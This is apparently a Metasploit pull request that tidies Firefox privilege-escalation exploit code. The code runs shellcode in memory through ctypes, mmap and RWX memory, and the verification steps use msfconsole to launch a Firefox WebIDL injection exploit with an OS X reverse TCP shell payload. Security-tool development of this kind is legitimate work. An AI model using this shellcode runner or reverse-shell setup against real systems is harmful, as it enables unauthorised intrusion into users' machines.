### PR TITLE
Fix firefox in-memory payload execution

### DIFF
--- a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
+++ b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
@@ -36,6 +36,7 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
     %Q|
       var execShellcode = function(shellcode, bytes) {
         Components.utils.import("resource://gre/modules/ctypes.jsm");
+
         var execPosix = function() {
           var RWX = 7, ANON_PRIVATE = 4098;
           Components.utils.import("resource://gre/modules/ctypes.jsm");
@@ -77,7 +78,6 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
           );
           var buff = mmap(null, shellcode.length, RWX, ANON_PRIVATE, 0, 0);
           var cstr = ctypes.jschar.array()(shellcode);
-          //var bytes = ctypes.char.array()(shellcode).length-1;
           memcpy(buff, cstr, bytes);
           /* there is probably a better way to do this */
           var m = buff.toString().match(/"0x([0-9a-fA-F]*)"/);


### PR DESCRIPTION
Fixes #4374
#### Verification
- [x] Get a shell from a native payload against `exploits/multi/browser/firefox_webidl_injection`:
  
  ```
  msf> use exploits/multi/browser/firefox_webidl_injection
  msf> set target 1
  msf> set payload osx/x64/shell_reverse_tcp
  msf> set lhost 192.168.0.2
  msf> run
  ```
